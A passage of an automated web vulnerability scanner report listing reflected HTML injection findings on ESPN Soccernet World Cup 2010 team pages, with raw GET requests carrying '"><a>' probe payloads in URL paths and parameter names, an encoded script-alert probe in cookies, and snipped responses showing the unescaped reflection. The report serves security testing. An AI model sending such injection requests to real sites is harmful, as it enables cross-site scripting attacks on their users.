DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:09:31 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:09:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN08
Cache-Expires: Sat, 06 Nov 2010 23:14:31 GMT
Content-Length: 80435
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>France Football / S ...[SNIP]... <a href="/worldcup2010/team?team=478&_slug_=francefa8c8"><a>f460e0de5a0&topId=806664&linktext=New+France+coach+admits+concerns"> ...[SNIP]...
2.88. http://soccernet.espn.go.com/worldcup2010/team/_/team/478/france [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/478/france
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80bf3"><a>247a72dcc41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/478/france?80bf3"><a>247a72dcc41=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:24 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:24 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN17
Cache-Expires: Sat, 06 Nov 2010 23:13:24 GMT
Content-Length: 80543
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>France Football / S ...[SNIP]... <a href="/worldcup2010/team?team=478&80bf3"><a>247a72dcc41=1&_slug_=france&80bf3"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a81a1"><a>b81a40a8bd9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4789/ivory-coasta81a1"><a>b81a40a8bd9 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:15:13 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:15:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN15
Cache-Expires: Sat, 06 Nov 2010 23:20:08 GMT
Content-Length: 81695
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ivory Coast Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4789&_slug_=ivory-coasta81a1"><a>b81a40a8bd9&topId=802166&linktext=Eriksson+hails+Ivory+Coast+players"> ...[SNIP]...
2.90. http://soccernet.espn.go.com/worldcup2010/team/_/team/4789/ivory-coast [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/4789/ivory-coast
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44ff8"><a>ef29493db25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4789/ivory-coast?44ff8"><a>ef29493db25=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:11:09 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:11:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Sat, 06 Nov 2010 23:16:08 GMT
Content-Length: 81803
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ivory Coast Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4789&44ff8"><a>ef29493db25=1&_slug_=ivory-coast&44ff8"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b84"><a>1e9fca54d00 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/479/denmark46b84"><a>1e9fca54d00 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:48 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN31
Cache-Expires: Sat, 06 Nov 2010 23:13:48 GMT
Content-Length: 82130
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Denmark Football / ...[SNIP]... <a href="/worldcup2010/team?team=479&_slug_=denmark46b84"><a>1e9fca54d00&topId=801786&linktext=Denmark+coach+devastated+by+defeat"> ...[SNIP]...
2.92. http://soccernet.espn.go.com/worldcup2010/team/_/team/479/denmark [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/479/denmark
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92395"><a>78611054bea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/479/denmark?92395"><a>78611054bea=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:53 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN06
Cache-Expires: Sat, 06 Nov 2010 23:12:53 GMT
Content-Length: 82238
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Denmark Football / ...[SNIP]... <a href="/worldcup2010/team?team=479&92395"><a>78611054bea=1&_slug_=denmark&92395"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95388"><a>7a7e4d9961e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/481/germany95388"><a>7a7e4d9961e HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:09:42 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:09:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN04
Cache-Expires: Sat, 06 Nov 2010 23:14:42 GMT
Content-Length: 80545
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Germany Football / ...[SNIP]... <a href="/worldcup2010/team?team=481&_slug_=germany95388"><a>7a7e4d9961e&topId=807747&linktext=Germany+finish+in+third+place"> ...[SNIP]...
2.94. http://soccernet.espn.go.com/worldcup2010/team/_/team/481/germany [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://soccernet.espn.go.com
Path: /worldcup2010/team/_/team/481/germany
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6197"><a>19cb7e46d2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/481/germany?c6197"><a>19cb7e46d2e=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:44 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Sat, 06 Nov 2010 23:13:43 GMT
Content-Length: 80653
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Germany Football / ...[SNIP]... <a href="/worldcup2010/team?team=481&c6197"><a>19cb7e46d2e=1&_slug_=germany&c6197"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1efcc"><a>d926d468a72 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/482/portugal1efcc"><a>d926d468a72 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
